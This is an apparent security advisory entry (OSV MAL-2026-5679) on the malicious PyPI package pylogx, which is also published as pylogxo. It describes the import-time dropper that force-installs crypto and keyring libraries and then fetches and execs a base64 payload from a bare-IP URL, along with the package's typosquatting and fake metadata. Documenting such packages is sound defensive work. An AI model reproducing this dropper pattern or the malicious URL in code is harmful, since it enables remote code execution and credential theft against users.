OSV ID
MAL-2026-5679
Ecosystem
pypi
Summary
On import pylogx , the package spawns a background thread that sleeps 5-20 seconds, force-installs sensitive third-party packages (cryptography, pycryptodomex, secretstorage, opencv-python, pillow, psutil) via pip, then fetches a base64-encoded blob from http://69.164.245.166/payload.txt over plaintext HTTP and passes the decoded bytes to exec() with a synthetic __name__ = "__payload__" . The destination is a bare IP with no TLS, no pinning, and no signature verification, so any code the operator of that host serves runs in the importing process. The pre-installed dependency set (secretstorage + cryptography) is consistent with a follow-on credential / keyring harvester. The package is also distributed under the name pylogxo while installing the import name pylogx — a near-edit of legitimate logging library names — and ships placeholder metadata (empty README, https://github.com/example/pylogx , support@pylogx.example ) and references submodules ( formatter , handlers ) that do not exist in the tarball, so the module will ImportError only after the dropper thread has already fired. There is no legitimate reason for a logging utility to fetch and execute remote code at import time.
Source: amazon-inspector (bbeee018f429f5a978b85aa3999c8e24251a85dc787b1e4fd673abcabf157800)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.